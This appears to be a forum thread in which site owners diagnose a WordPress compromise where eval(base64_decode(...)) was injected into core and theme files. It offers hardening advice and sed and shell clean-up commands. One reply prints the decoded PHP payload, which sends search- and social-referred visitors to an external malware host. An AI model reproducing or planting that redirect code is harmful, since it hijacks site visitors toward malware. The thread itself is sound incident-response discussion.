
WordPress Website Compromised Hack

A WordPress website we are running for a client has been compromised and we are trying to establish how they may have got in. It seems they have injected code into EVERY WP core file, all theme files and only a few select plugin files.

The code they used is:

eval(base64_decode("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"));

Has anyone seen or heard of this before? And does anyone have any clues as to how this may have happened? All WP file permissions are set to the recommended levels.

Thanks for your time.

The most common way that I've seen this happen is when people set all of their files and folders to 777. If you have to do this for your wp-content/uploads folder, be sure that you have .htaccess directives that prevent script execution in there. Your files and folders should have the minimum permissions needed to run (files 644, folders 755).

You also have to go through all the instructions at these WP links to completely clean your install and prevent the code injection into either WP core or template files: See FAQ: My site was hacked « WordPress Codex and How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress and Hardening WordPress « WordPress Codex. Tell your host and change all passwords. Possibly change hosts, too; some shared hosts are more vulnerable than others.

This doesn't help all the time, because it depends on overall server and web host parameters, which on inexpensive shared hosts can leave them vulnerable, but you can try these to protect .htaccess and wp-config.php:

<Files .htaccess>
order deny,allow
deny from all
</Files>

<Files wp-config.php>
order allow,deny
deny from all
</Files>

in .htaccess.

I had exactly the same problem.

I guess the site was infected through the widgets, because I use one plugin which allows PHP code to be executed.

My best solution was:

  • Eliminate the suspicious widget.
  • See the time and date of one infected file (my case: header.php).
  • Clear all infected files (in my case I have a backup of the site).
  • Search the log file for suspicious IPs at that time (search the found IPs on blacklists).
  • Install one plugin to ban suspicious IPs.

From that moment the problem was gone.

I had this problem the other day and found sed very useful in cleaning out the rubbish. It attached itself to every opening PHP tag and often left code on the end of the line, so it required a bit of careful config.

I believe this is the command I used, but be careful, this is sed after all ;-)...

find . -name "*.php" -type f -exec sed -i 's/eval(.*));//' {} \;
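A tighter version of that clean-up, added here as an example and not code from any answer in the thread: it anchors the pattern to the base64 alphabet so it removes only the injected eval(base64_decode("...")); statement and keeps legitimate code that shares the line, and it leaves a .bak copy of every file it touches for later comparison. It assumes a sed that supports -E and -i (GNU or BSD) and grep -E; the small WordPress-like tree it builds is constructed for the demo.

```shell
# Added example (not from the thread): find and strip the
# eval(base64_decode("...")); injection described above.

# Pattern anchored to the base64 alphabet, so it cannot run past the
# injected statement the way a greedy eval(.*)); would.
INJ_RE='eval\(base64_decode\("[A-Za-z0-9+/=]+"\)\);'

# List PHP files under $1 that carry the injection (one path per line).
find_injected() {
    find "$1" -type f -name '*.php' -exec grep -lE "$INJ_RE" {} +
}

# Strip the injected statement from every hit, leaving a .bak copy beside
# each modified file; prints each cleaned path.
clean_injected() {
    find_injected "$1" | while IFS= read -r f; do
        # '#' as the s/// delimiter because the pattern contains '/'
        sed -i.bak -E "s#$INJ_RE##g" "$f"
        printf '%s\n' "$f"
    done
}

# Number of PHP files still carrying the injection (0 means done).
count_injected() {
    find_injected "$1" | wc -l | tr -d ' '
}

# Build a throw-away tree for the demo (constructed sample data).
make_demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/themes/x"
    # injection prepended to the opening tag line, real code after it;
    # the payload is just base64 of: echo "hi";
    printf '<?php eval(base64_decode("ZWNobyAiaGkiOw==")); get_header();\n' \
        > "$d/wp-content/themes/x/header.php"
    printf '<?php\n// untouched file\n' > "$d/index.php"
    printf '%s\n' "$d"
}
```

Run count_injected again after cleaning; a non-zero count means a variant of the injection (different wrapper, different encoding) that the pattern does not cover and needs a manual look.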

So, the code below is redirecting your users to a black-listed malware site? Is that what you're experiencing?

// Decoded payload: only fires when headers are not yet sent, the visitor has a
// user agent, and the referer is a search engine or social site (i.e. a human
// arriving via a link, not a crawler); it then redirects them to an external host.
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
            // skips cached / "inurl" search result views
            if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                header("Location: http://costabrava.bee.pl/");
                exit();
            }
        }
    }
}

Your version of WordPress is likely vulnerable to XSS. This link discusses it. http://www.ethicalhack3r.co.uk/security/wordpress-3-3-cross-site-scripting-xss/

What version are you on?
